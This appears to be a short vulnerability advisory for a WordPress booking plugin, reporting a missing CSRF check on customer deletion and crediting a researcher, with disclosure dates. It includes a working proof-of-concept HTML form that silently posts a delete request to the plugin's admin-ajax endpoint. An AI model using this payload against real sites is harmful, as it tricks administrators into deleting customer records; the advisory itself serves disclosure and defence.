The plugin does not have CSRF check in place when deleting customers, which could allow attackers to make a logged in admin delete arbitrary customers via a CSRF attack
<html> <body> <form action="https://example.com/wp-admin/admin-ajax.php?action=wpamelia_api&call=/users/customers/delete/1" method="POST"> <input type="submit" value="Submit request" /> </form> </body> </html>
Muhamad Hidayat
muhamad hidayat
Yes
2022-02-23 (about 1 years ago)
2022-02-23 (about 1 years ago)
2022-04-11 (about 1 years ago)